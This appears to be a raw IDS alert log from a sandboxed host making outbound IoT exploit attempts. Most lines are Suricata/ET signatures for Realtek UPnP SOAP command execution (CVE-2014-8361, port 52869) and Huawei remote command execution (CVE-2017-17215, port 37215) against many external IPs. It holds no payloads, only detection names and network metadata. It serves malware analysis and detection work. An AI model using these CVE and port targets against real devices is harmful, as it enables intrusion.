                                      07/20/24-23:01:45.967403TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24834252869192.168.2.23158.240.85.125
                                      07/20/24-23:01:27.651536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3828237215192.168.2.23104.187.254.126
                                      07/20/24-23:02:13.672930TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23665852869192.168.2.23128.140.142.60
                                      07/20/24-23:01:45.010540TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25353652869192.168.2.2317.241.55.92
                                      07/20/24-23:01:42.944606TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3824652869192.168.2.2324.28.111.138
                                      07/20/24-23:01:01.410784TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4960252869192.168.2.23114.57.93.253
                                      07/20/24-23:01:42.718842TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3718252869192.168.2.23165.221.172.161
                                      07/20/24-23:01:24.915904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3640437215192.168.2.23197.160.117.230
                                      07/20/24-23:01:57.795137TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5413052869192.168.2.23129.174.206.130
                                      07/20/24-23:01:07.005155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3944437215192.168.2.2341.187.195.110
                                      07/20/24-23:01:31.331748TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24285052869192.168.2.23113.130.121.87
                                      07/20/24-23:01:08.611391TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3498252869192.168.2.23178.251.54.152
                                      07/20/24-23:01:46.092258TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5664252869192.168.2.2388.29.47.240
                                      07/20/24-23:01:44.440718TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25530252869192.168.2.2349.137.23.5
                                      07/20/24-23:01:53.122466TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5346452869192.168.2.2381.50.220.234
                                      07/20/24-23:01:53.537092TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6053452869192.168.2.23167.207.100.170
                                      07/20/24-23:01:04.039128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4172437215192.168.2.2341.167.36.239
                                      07/20/24-23:01:20.144672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5971037215192.168.2.2323.247.196.153
                                      07/20/24-23:01:24.885895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3775237215192.168.2.23157.108.180.162
                                      07/20/24-23:01:40.321300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5429237215192.168.2.23197.176.61.239
                                      07/20/24-23:01:42.984532TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615740452869192.168.2.2335.221.171.171
                                      07/20/24-23:01:45.775798TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615156852869192.168.2.2362.188.56.156
                                      07/20/24-23:01:11.634372TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5738237215192.168.2.23157.37.216.246
                                      07/20/24-23:01:44.318262TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4488052869192.168.2.23223.217.31.58
                                      07/20/24-23:01:00.648489TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5699637215192.168.2.2341.39.168.222
                                      07/20/24-23:01:45.764338TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5336852869192.168.2.2390.133.16.151
                                      07/20/24-23:01:47.807536TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614854652869192.168.2.23142.206.118.182
                                      07/20/24-23:01:52.740670TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613790252869192.168.2.2320.232.50.163
                                      07/20/24-23:01:24.898476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5764237215192.168.2.2341.41.194.11
                                      07/20/24-23:01:11.028341TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615205052869192.168.2.23223.86.47.43
                                      07/20/24-23:00:57.223015TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3677237215192.168.2.23182.102.31.222
                                      07/20/24-23:01:03.286497TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3487452869192.168.2.23134.167.171.74
                                      07/20/24-23:01:20.157619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5004837215192.168.2.2319.104.128.245
                                      07/20/24-23:01:45.331813TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613531052869192.168.2.23148.216.25.247
                                      07/20/24-23:01:46.284457TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25340652869192.168.2.23212.16.123.155
                                      07/20/24-23:01:06.988055TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5968437215192.168.2.2341.241.168.134
                                      07/20/24-23:01:52.826575TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4719452869192.168.2.2387.75.190.2
                                      07/20/24-23:01:58.249114TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615184852869192.168.2.2340.172.192.128
                                      07/20/24-23:01:24.889164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4716437215192.168.2.23197.79.73.48
                                      07/20/24-23:01:04.100971TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6025037215192.168.2.23157.85.128.112
                                      07/20/24-23:01:43.906354TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5975052869192.168.2.23101.52.13.24
                                      07/20/24-23:02:14.779973TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5253652869192.168.2.23167.89.14.43
                                      07/20/24-23:01:50.257796TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614152852869192.168.2.2387.152.13.65
                                      07/20/24-23:01:07.018425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3500437215192.168.2.2341.171.209.210
                                      07/20/24-23:01:56.091033TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615291052869192.168.2.23217.227.78.54
                                      07/20/24-23:01:44.389834TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25803852869192.168.2.23129.65.153.68
                                      07/20/24-23:01:42.727936TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4304852869192.168.2.23128.128.73.171
                                      07/20/24-23:01:47.951292TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5403652869192.168.2.23213.139.230.45
                                      07/20/24-23:01:46.064501TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25970252869192.168.2.2336.185.15.35
                                      07/20/24-23:01:04.039128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3904037215192.168.2.23151.22.190.51
                                      07/20/24-23:01:20.598095TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3505452869192.168.2.2373.36.171.85
                                      07/20/24-23:01:42.914230TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5238652869192.168.2.2367.74.166.37
                                      07/20/24-23:01:44.624990TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5140452869192.168.2.23223.103.54.206
                                      07/20/24-23:00:59.157444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4799637215192.168.2.23157.75.190.222
                                      07/20/24-23:01:08.598416TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3310852869192.168.2.234.72.134.93
                                      07/20/24-23:01:46.072415TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614998052869192.168.2.2392.210.119.212
                                      07/20/24-23:01:52.820390TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5491452869192.168.2.23158.140.216.184
                                      07/20/24-23:01:44.963815TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5805052869192.168.2.23132.247.218.225
                                      07/20/24-23:01:11.820149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5755837215192.168.2.2341.247.75.173
                                      07/20/24-23:01:57.518588TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25524252869192.168.2.23139.3.200.28
                                      07/20/24-23:01:46.844704TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4065652869192.168.2.23185.86.48.66
                                      07/20/24-23:00:59.148144TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4749037215192.168.2.23157.211.128.165
                                      07/20/24-23:01:31.314147TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5858852869192.168.2.23184.170.117.213
                                      07/20/24-23:01:27.658221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3906637215192.168.2.2341.105.180.115
                                      07/20/24-23:01:44.510114TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614690452869192.168.2.23133.172.125.251
                                      07/20/24-23:01:47.006773TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5553252869192.168.2.23116.238.28.166
                                      07/20/24-23:01:40.310207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4954837215192.168.2.23157.85.94.106
                                      07/20/24-23:01:02.060344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5001437215192.168.2.23197.27.25.91
                                      07/20/24-23:01:00.633578TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5956237215192.168.2.23197.67.79.4
                                      07/20/24-23:01:32.032492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5988037215192.168.2.23197.56.101.214
                                      07/20/24-23:01:02.045831TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3786037215192.168.2.2341.13.208.139
                                      07/20/24-23:01:41.956472TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25560852869192.168.2.2380.7.39.33
                                      07/20/24-23:01:10.603142TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615356252869192.168.2.2335.68.164.37
                                      07/20/24-23:01:21.937814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4538837215192.168.2.23213.191.23.16
                                      07/20/24-23:01:46.485082TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5143652869192.168.2.23109.104.48.215
                                      07/20/24-23:01:45.544315TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613476852869192.168.2.2391.148.233.46
                                      07/20/24-23:01:01.629050TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3713452869192.168.2.23129.167.170.254
                                      07/20/24-23:01:59.707284TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4753852869192.168.2.2342.196.122.240
                                      07/20/24-23:01:07.033766TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5133237215192.168.2.23220.78.147.215
                                      07/20/24-23:01:08.565610TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24373652869192.168.2.23119.187.229.164
                                      07/20/24-23:01:04.014688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4902837215192.168.2.23197.202.235.206
                                      07/20/24-23:01:42.827952TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4064852869192.168.2.23192.160.62.15
                                      07/20/24-23:01:46.520662TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3695852869192.168.2.2337.115.2.79
                                      07/20/24-23:01:00.645051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4716437215192.168.2.23157.63.143.206
                                      07/20/24-23:01:42.908066TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5525852869192.168.2.2391.160.10.25
                                      07/20/24-23:01:44.311969TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3377652869192.168.2.23192.101.61.62
                                      07/20/24-23:02:00.908220TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615622252869192.168.2.23192.173.75.154
                                      07/20/24-23:01:08.650213TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3457652869192.168.2.2386.86.67.253
                                      07/20/24-23:01:58.028191TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4047852869192.168.2.23175.65.204.131
                                      07/20/24-23:01:06.973541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4264437215192.168.2.23150.244.11.188
                                      07/20/24-23:01:46.261793TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25398852869192.168.2.23162.205.235.41
                                      07/20/24-23:01:21.928521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3859637215192.168.2.235.7.138.144
                                      07/20/24-23:01:41.912337TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6020652869192.168.2.2377.135.26.34
                                      07/20/24-23:01:42.988853TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5582852869192.168.2.2350.88.74.31
                                      07/20/24-23:01:25.012815TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614102052869192.168.2.23115.28.108.81
                                      07/20/24-23:01:45.426290TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4169852869192.168.2.23223.51.209.65
                                      07/20/24-23:01:51.056707TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613413452869192.168.2.2362.146.159.96
                                      07/20/24-23:01:02.127340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4661637215192.168.2.2341.243.119.9
                                      07/20/24-23:01:42.703494TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23898852869192.168.2.2385.239.208.54
                                      07/20/24-23:01:47.537829TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5490052869192.168.2.23129.164.36.164
                                      07/20/24-23:01:42.799973TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613419852869192.168.2.23132.171.123.209
                                      07/20/24-23:01:47.669469TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24669452869192.168.2.2360.33.175.153
                                      07/20/24-23:00:57.221145TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4401437215192.168.2.23143.179.199.146
                                      07/20/24-23:01:08.581974TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3492652869192.168.2.2338.47.147.236
                                      07/20/24-23:01:11.634372TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5048637215192.168.2.2341.28.156.220
                                      07/20/24-23:01:09.027075TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24951652869192.168.2.23213.46.179.130
                                      07/20/24-23:01:31.321189TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24879052869192.168.2.23157.217.190.133
                                      07/20/24-23:01:42.136561TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6001852869192.168.2.23118.130.245.154
                                      07/20/24-23:01:06.989167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5303237215192.168.2.23197.116.102.178
                                      07/20/24-23:01:47.331200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4680652869192.168.2.23191.68.229.244
                                      07/20/24-23:01:56.013827TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5788252869192.168.2.23114.121.50.137
                                      07/20/24-23:01:46.855307TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3617652869192.168.2.23211.143.251.133
                                      07/20/24-23:01:47.532849TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614041052869192.168.2.2343.128.21.230
                                      07/20/24-23:01:44.405053TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25343052869192.168.2.2383.99.82.220
                                      07/20/24-23:01:26.125703TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3607652869192.168.2.23149.142.97.135
                                      07/20/24-23:00:57.221570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5330237215192.168.2.23157.143.196.120
                                      07/20/24-23:02:00.371741TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4142652869192.168.2.2339.135.72.98
                                      07/20/24-23:01:20.096752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5866037215192.168.2.23197.114.190.173
                                      07/20/24-23:01:42.072139TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4271052869192.168.2.23113.10.123.41
                                      07/20/24-23:01:42.334131TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5544052869192.168.2.2387.76.92.180
                                      07/20/24-23:01:57.360180TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4811252869192.168.2.23220.91.249.28
                                      07/20/24-23:01:00.635367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4943237215192.168.2.23157.146.94.28
                                      07/20/24-23:01:24.885849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3749637215192.168.2.23157.164.236.148
                                      07/20/24-23:01:00.645051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6091037215192.168.2.23197.118.146.83
                                      07/20/24-23:01:08.683684TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5949052869192.168.2.23175.24.153.194
                                      07/20/24-23:02:12.234515TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615829052869192.168.2.23129.212.42.23
                                      07/20/24-23:01:40.349275TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4414037215192.168.2.23157.88.24.192
                                      07/20/24-23:01:44.890268TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4579052869192.168.2.23110.45.133.89
                                      07/20/24-23:01:42.908066TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613759852869192.168.2.2398.171.161.225
                                      07/20/24-23:01:54.796749TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23715852869192.168.2.23180.65.88.44
                                      07/20/24-23:01:41.276434TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5475652869192.168.2.2386.130.161.177
                                      07/20/24-23:01:42.660847TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5929252869192.168.2.23161.245.24.12
                                      07/20/24-23:01:06.973541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3666637215192.168.2.23197.26.127.58
                                      07/20/24-23:01:40.307219TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5479237215192.168.2.23144.44.56.47
                                      07/20/24-23:01:02.048113TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5563237215192.168.2.23157.78.46.190
                                      07/20/24-23:01:41.315380TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4704252869192.168.2.23163.212.66.23
                                      07/20/24-23:01:42.632123TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3460052869192.168.2.23134.135.7.1
                                      07/20/24-23:01:50.001369TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4539452869192.168.2.2360.33.175.153
                                      07/20/24-23:01:42.536855TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26021052869192.168.2.23100.0.247.159
                                      07/20/24-23:01:42.641430TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5514052869192.168.2.232.108.114.50
                                      07/20/24-23:01:08.679677TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24708652869192.168.2.23103.179.244.2
                                      07/20/24-23:01:20.592206TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25800052869192.168.2.23211.27.252.180
                                      07/20/24-23:01:47.038105TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23758252869192.168.2.23117.120.22.241
                                      07/20/24-23:01:51.743446TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3689452869192.168.2.2397.254.137.62
                                      07/20/24-23:01:59.604768TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614808652869192.168.2.2393.56.206.158
                                      07/20/24-23:01:31.978142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6057837215192.168.2.23197.39.192.146
                                      07/20/24-23:00:57.220937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5422237215192.168.2.2337.80.86.165
                                      07/20/24-23:02:10.031806TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614906052869192.168.2.2363.25.37.64
                                      07/20/24-23:01:00.634165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5855637215192.168.2.23197.75.123.93
                                      07/20/24-23:01:44.713195TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5564852869192.168.2.23136.252.196.177
                                      07/20/24-23:01:49.172806TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615486852869192.168.2.2389.142.100.244
                                      07/20/24-23:01:02.048367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5372037215192.168.2.23157.43.220.26
                                      07/20/24-23:01:44.302645TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4591852869192.168.2.23106.2.127.68
                                      07/20/24-23:01:57.313050TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4881252869192.168.2.23187.4.24.206
                                      07/20/24-23:01:43.030153TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615865452869192.168.2.23143.69.193.236
                                      07/20/24-23:01:43.415157TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5327652869192.168.2.2341.215.7.68
                                      07/20/24-23:00:59.201033TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4348237215192.168.2.23198.254.9.254
                                      07/20/24-23:01:44.409097TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5291652869192.168.2.2334.198.8.37
                                      07/20/24-23:01:56.485717TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3634052869192.168.2.23106.180.129.117
                                      07/20/24-23:01:58.001186TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614366252869192.168.2.23130.165.149.247
                                      07/20/24-23:01:43.917774TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615078452869192.168.2.23143.225.143.5
                                      07/20/24-23:01:31.311969TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24683052869192.168.2.23211.69.194.148
                                      07/20/24-23:01:14.103467TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4823237215192.168.2.23197.92.118.78
                                      07/20/24-23:01:08.595072TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5290052869192.168.2.23152.136.236.137
                                      07/20/24-23:01:43.158920TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5206652869192.168.2.23200.248.84.13
                                      07/20/24-23:02:04.022245TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4824052869192.168.2.23213.105.77.79
                                      07/20/24-23:01:47.921416TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5561252869192.168.2.23185.104.180.12
                                      07/20/24-23:01:52.425638TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614059452869192.168.2.23171.195.37.248
                                      07/20/24-23:02:17.865555TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24028052869192.168.2.23157.109.59.232
                                      07/20/24-23:00:59.163619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5255237215192.168.2.23157.113.160.230
                                      07/20/24-23:01:42.147980TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5643252869192.168.2.23112.189.246.31
                                      07/20/24-23:01:43.621955TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24083252869192.168.2.23123.6.144.179
                                      07/20/24-23:01:00.647695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3398437215192.168.2.2341.137.58.228
                                      07/20/24-23:01:34.045749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4324237215192.168.2.23157.42.95.98
                                      07/20/24-23:01:53.308763TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5256252869192.168.2.2317.116.47.253
                                      07/20/24-23:01:47.924852TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5893652869192.168.2.23162.230.61.146
                                      07/20/24-23:02:13.086086TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3868452869192.168.2.2348.17.76.254
